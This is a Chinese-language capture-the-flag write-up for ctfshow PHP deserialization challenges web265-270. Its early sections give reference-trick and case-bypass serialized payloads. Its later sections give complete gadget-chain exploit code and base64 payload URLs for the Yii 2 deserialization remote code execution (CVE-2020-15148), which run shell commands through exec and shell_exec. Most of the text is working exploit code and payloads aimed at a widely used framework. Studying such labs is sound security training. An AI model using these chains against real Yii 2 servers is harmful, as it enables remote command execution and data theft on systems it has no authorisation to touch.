目录
1、web265
2、web266
3、web267
4、web268
5、web269
6、web270
1、web265
很简单的一个判断,满足 $this->token===$this->password; 即可
由于 $ctfshow->token=md5(mt_rand()) 会把 token 重新赋成一个随机的 md5 值,直接给两个属性填相同的值是不够的。这里用引用(&)让 token 和 password 指向同一个 zval:序列化后 password 以 R:2 的形式指向 token,反序列化时引用关系会被还原,之后 token 被改成什么 password 就跟着变成什么,=== 恒成立
exp:
<?php
/**
 * web265: build a serialized ctfshowAdmin whose token and password share one
 * reference, so the server-side `$this->token === $this->password` check
 * still holds after token is overwritten with md5(mt_rand()).
 */
class ctfshowAdmin
{
    public $token;
    public $password;

    public function __construct($t, $p)
    {
        $this->token = $t;
        $this->password = $p;
    }
}

$admin = new ctfshowAdmin(1, 2);
// Bind both properties to the same zval: serialize() emits password as R:2
// (a back-reference to token) and unserialize() rebuilds the reference.
$admin->token = &$admin->password;
print serialize($admin);
?>
payload:
?ctfshow=O:12:"ctfshowAdmin":2:{s:5:"token";i:2;s:8:"password";R:2;}
拿到 flag:ctfshow{11cbda99-2f50-42bb-89f9-d9b08318d448}
2、web266
__destruct() 在对象被销毁时自动调用,我们只需要让 ctfshow 类被正确反序列化即可。但直接传 ctfshow 会被正则检测到并抛出异常;未捕获的异常会让脚本以致命错误终止,此时已经反序列化出来的对象不会走正常的析构流程,__destruct() 也就不会被触发。
这里的正则匹配区分大小写,而 PHP 的类名是不区分大小写的,因此把类名写成 Ctfshow 既能绕过检测,unserialize() 又仍然会实例化 ctfshow 类
exp:
<?php
/**
 * web266: serialized ctfshow object that slips past the case-sensitive
 * class-name filter. The class is spelled "Ctfshow" on purpose: PHP resolves
 * class names case-insensitively, so unserialize() still builds a ctfshow.
 */
class Ctfshow
{
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';
}

$obj = new Ctfshow();
print serialize($obj);
payload:
O:7:"Ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}
bp 重放或者 raw 模式下使用 hackbar,不然可能没回显
拿到 flag:ctfshow{cd17da6b-75f5-4cfc-b792-39bb72724740}
另一种思路是在异常抛出之前就强制触发 GC,让对象提前被回收,从而抢在脚本终止前执行 __destruct() 魔术方法
触发方式有两种:对象被 unset() 处理时;数组对象为 NULL 时
这里采用第二种方式
exp:
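<?php
/**
 * web266 (variant): wrap the ctfshow object in an array so the payload can
 * be arranged to release the object early and run __destruct() before the
 * filter's exception kills the request.
 *
 * Fix over the original listing: "<?phpclass" is not a valid open tag (PHP
 * requires whitespace after "<?php"), so the script would not even parse.
 *
 * NOTE(review): as serialized here this is a plain two-element array; the
 * early-destruct trick is usually achieved with a malformed or duplicate-key
 * array so the object is freed during unserialize() - confirm on the target.
 */
class ctfshow
{
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';
}

$target = new ctfshow();
// Index 0 carries the gadget, index 1 is filler - the shape of the payload.
$wrapper = [$target, 0];
echo serialize($wrapper);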
payload:
a:2:{i:0;O:7:"ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}i:1;i:0;}
3、web267
admin/admin 可以登录
提示 get 请求 view-source
///backdoor/shell
unserialize(base64_decode($_GET['code']))
这是 Yii 2 的反序列化 RCE:CVE-2020-15148(影响 2.0.38 之前的版本,入口是 yii\db\BatchQueryResult 的 __destruct)
用现成的 poc 打:
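<?php
/**
 * web267: CVE-2020-15148 gadget chain for Yii 2.
 *
 *   yii\db\BatchQueryResult::__destruct  -> $_dataReader->close()
 *   Faker\Generator::__call('close')     -> $formatters['close'] callable
 *   yii\rest\IndexAction::run()          -> $checkAccess($id)
 *
 * The call flow above is the one described in public write-ups of the CVE;
 * confirm it against the target's Yii/Faker versions. Property visibility
 * must mirror the real classes so the serialized names line up (private
 * "\0yii\db\BatchQueryResult\0_dataReader", protected "\0*\0formatters").
 *
 * Fix over the original listing: "<?phpnamespace" is not a valid open tag.
 */
namespace yii\rest {
    class IndexAction
    {
        public $checkAccess;
        public $id;

        public function __construct()
        {
            // checkAccess is invoked as a callable with id as its argument.
            $this->checkAccess = 'exec';
            $this->id = 'cat /f* > my6n.txt';
        }
    }
}

namespace Faker {
    use yii\rest\IndexAction;

    class Generator
    {
        protected $formatters;

        public function __construct()
        {
            // [object, 'run'] is a valid PHP callable.
            $this->formatters['close'] = [new IndexAction(), 'run'];
        }
    }
}

namespace yii\db {
    use Faker\Generator;

    class BatchQueryResult
    {
        private $_dataReader;

        public function __construct()
        {
            $this->_dataReader = new Generator();
        }
    }
}

namespace {
    use yii\db\BatchQueryResult;

    // Output is base64 for the ?code= parameter; the trailing "=" may be
    // dropped in the URL.
    echo base64_encode(serialize(new BatchQueryResult()));
}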
payload:
?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czo0OiJleGVjIjtzOjI6ImlkIjtzOjE4OiJjYXQgL2YqID4gbXk2bi50eHQiO31pOjE7czozOiJydW4iO319fX0
访问 my6n.txt 即可看到 flag(命令输出落在 web 根目录下,任何人都能读,拿完记得删掉)
4、web268
上一题的 poc 打不通了,换一条链:把中间的 Faker\Generator::$formatters 换成 yii\web\DbSession::$writeCallback,终点仍然是 yii\rest\IndexAction::run()
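<?php
/**
 * web268-270: CVE-2020-15148 chain for Yii 2 with the Faker\Generator sink
 * swapped for yii\web\DbSession::$writeCallback.
 *
 *   yii\db\BatchQueryResult::__destruct -> $_dataReader->close()
 *   yii\web\DbSession (close)           -> $writeCallback callable
 *   yii\rest\IndexAction::run()         -> $checkAccess($id)
 *
 * Flow as described in public write-ups of the CVE - confirm against the
 * target's Yii version.
 *
 * Fix over the original listing: IndexAction now extends Action and declares
 * $id instead of creating both properties dynamically. PHP 8.2+ emits a
 * "Creation of dynamic property" deprecation for the old form, which (with
 * display_errors on) gets mixed into the printed base64. Serialized order is
 * unchanged: checkAccess (inherited) then id, both public.
 */
namespace yii\rest {
    class Action
    {
        public $checkAccess;
    }

    class IndexAction extends Action
    {
        public $id;

        /**
         * @param string $func  callable name invoked by run()
         * @param string $param single argument passed to $func
         */
        public function __construct($func, $param)
        {
            $this->checkAccess = $func;
            $this->id = $param;
        }
    }
}

namespace yii\web {
    abstract class MultiFieldSession
    {
        public $writeCallback;
    }

    class DbSession extends MultiFieldSession
    {
        public function __construct($func, $param)
        {
            // [object, 'run'] is a valid PHP callable for the write hook.
            $this->writeCallback = [new \yii\rest\IndexAction($func, $param), 'run'];
        }
    }
}

namespace yii\db {
    class BatchQueryResult
    {
        // Private on purpose: serializes as "\0yii\db\BatchQueryResult\0_dataReader",
        // which must match the real class for unserialize() to populate it.
        private $_dataReader;

        public function __construct($func, $param)
        {
            $this->_dataReader = new \yii\web\DbSession($func, $param);
        }
    }
}

namespace {
    // shell_exec('cp /f* my6n.txt') copies the flag into the web root; the
    // file is world-readable there, remove it once read.
    $exp = new \yii\db\BatchQueryResult('shell_exec', 'cp /f* my6n.txt');
    echo base64_encode(serialize($exp));
}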
payload:
?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czoxMDoic2hlbGxfZXhlYyI7czoyOiJpZCI7czoxNToiY3AgL2YqIG15Nm4udHh0Ijt9aToxO3M6MzoicnVuIjt9fX0
拿到 flag:ctfshow{f5b30e4e-16e1-4fb2-ad07-c75c6c069453}
5、web269
同上,payload:
?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czoxMDoic2hlbGxfZXhlYyI7czoyOiJpZCI7czoxNToiY3AgL2YqIG15Nm4udHh0Ijt9aToxO3M6MzoicnVuIjt9fX0
6、web270
payload:
?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czoxMDoic2hlbGxfZXhlYyI7czoyOiJpZCI7czoxNToiY3AgL2YqIG15Nm4udHh0Ijt9aToxO3M6MzoicnVuIjt9fX0